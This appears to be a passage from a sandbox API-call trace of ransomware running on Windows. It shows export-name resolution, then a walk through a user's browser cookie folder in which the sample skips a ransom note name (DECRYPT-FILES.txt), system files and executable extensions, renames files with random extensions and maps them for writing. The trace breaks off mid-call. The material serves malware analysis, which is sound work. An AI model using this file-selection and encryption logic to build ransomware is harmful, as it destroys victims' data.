returned="CreateWaitableTimerExA" [0181.946] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.946] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.946] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.946] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.946] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.946] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.946] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.946] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.946] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.947] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.947] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.947] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.947] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.947] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.947] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.947] lstrlenA (lpString="DELETEATOM") returned 10 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.947] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.947] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.947] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.947] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.947] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.947] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.947] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.947] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.947] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.947] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.947] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.947] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.948] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.948] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.948] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.948] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.948] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.948] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.948] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.948] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.948] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.948] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.948] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.948] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.948] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.948] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.948] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.948] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.948] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.948] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.948] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.949] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.949] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.949] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.949] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.949] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.949] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.949] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.949] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.949] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.949] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.949] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.949] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.949] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.949] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.949] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.949] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.949] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.949] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.949] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.949] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.949] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.949] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.949] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.949] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46") returned 118 [0181.949] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46.MTUeQH") returned 125 [0181.949] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nf46"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46.MTUeQH" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nf46.mtueqh"), dwFlags=0x0) returned 1 [0181.950] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.950] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.951] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.951] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50b50050, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x50b50050, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0xab978ac0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x43f, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@msn[1].txt.67drq", cAlternateFileName="5P5NRG~1.67D")) returned 1 [0181.951] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt.67drq", lpString2="DECRYPT-FILES.txt") returned -1 [0181.951] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt.67drq", lpString2="autorun.inf") returned -1 [0181.951] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt.67drq", lpString2="boot.ini") returned -1 [0181.951] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt.67drq", lpString2="desktop.ini") returned -1 [0181.951] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt.67drq", lpString2="ntuser.dat") returned -1 [0181.951] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt.67drq", lpString2="iconcache.db") returned -1 [0181.951] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt.67drq", lpString2="bootsect.bak") returned -1 [0181.951] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt.67drq", lpString2="ntuser.dat.log") returned -1 [0181.951] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt.67drq", lpString2="thumbs.db") returned -1 [0181.951] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt.67drq", lpString2="Bootfont.bin") returned -1 [0181.951] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@msn[1].txt.67drq") returned 37 [0181.951] lstrcmpiW (lpString1="67drq", lpString2="lnk") returned -1 [0181.951] lstrcmpiW (lpString1="67drq", lpString2="exe") returned -1 [0181.951] lstrcmpiW (lpString1="67drq", lpString2="sys") returned -1 [0181.951] lstrcmpiW (lpString1="67drq", lpString2="dll") returned -1 [0181.951] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.951] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@msn[1].txt.67drq") returned 37 [0181.951] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.951] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@msn[1].txt.67drq" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt.67drq") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt.67drq" [0181.951] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.952] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt.67drq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt.67drq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.952] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=1087) returned 1 [0181.952] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.952] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.953] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.953] CloseHandle (hObject=0x288) returned 1 [0181.953] CloseHandle (hObject=0x284) returned 1 [0181.953] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.954] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5348e0b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5348e0b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xab9c4d80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa", cAlternateFileName="5P5NRG~1.XBA")) returned 1 [0181.954] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa", lpString2="DECRYPT-FILES.txt") returned -1 [0181.954] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa", lpString2="autorun.inf") returned -1 [0181.954] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa", lpString2="boot.ini") returned -1 [0181.954] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa", lpString2="desktop.ini") returned -1 [0181.954] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa", lpString2="ntuser.dat") returned -1 [0181.954] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa", lpString2="iconcache.db") returned -1 [0181.954] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa", lpString2="bootsect.bak") returned -1 [0181.954] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa", lpString2="ntuser.dat.log") returned -1 [0181.954] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa", lpString2="thumbs.db") returned -1 [0181.954] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa", lpString2="Bootfont.bin") returned -1 [0181.954] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa") returned 52 [0181.954] lstrcmpiW (lpString1="xbAIFa", lpString2="lnk") returned 1 [0181.954] lstrcmpiW (lpString1="xbAIFa", lpString2="exe") returned 1 [0181.954] lstrcmpiW (lpString1="xbAIFa", lpString2="sys") returned 1 [0181.954] lstrcmpiW (lpString1="xbAIFa", lpString2="dll") returned 1 [0181.954] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.954] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa") returned 52 [0181.954] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.954] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa" [0181.954] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.954] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbaifa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.955] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=470) returned 1 [0181.955] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.955] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.955] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.955] CloseHandle (hObject=0x288) returned 1 [0181.955] CloseHandle (hObject=0x284) returned 1 [0181.955] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.956] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf73d210, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf73d210, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xab9eaee0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x174, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb", cAlternateFileName="5P5NRG~1.AGH")) returned 1 [0181.956] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb", lpString2="DECRYPT-FILES.txt") returned -1 [0181.956] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb", lpString2="autorun.inf") returned -1 [0181.956] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb", lpString2="boot.ini") returned -1 [0181.956] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb", lpString2="desktop.ini") returned -1 [0181.956] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb", lpString2="ntuser.dat") returned -1 [0181.956] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb", lpString2="iconcache.db") returned -1 [0181.956] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb", lpString2="bootsect.bak") returned -1 [0181.956] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb", lpString2="ntuser.dat.log") returned -1 [0181.956] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb", lpString2="thumbs.db") returned -1 [0181.956] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb", lpString2="Bootfont.bin") returned -1 [0181.956] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb") returned 52 [0181.956] lstrcmpiW (lpString1="agH7oHb", lpString2="lnk") returned -1 [0181.956] lstrcmpiW (lpString1="agH7oHb", lpString2="exe") returned -1 [0181.956] lstrcmpiW (lpString1="agH7oHb", lpString2="sys") returned -1 [0181.956] lstrcmpiW (lpString1="agH7oHb", lpString2="dll") returned -1 [0181.956] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.956] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb") returned 52 [0181.956] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.956] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS 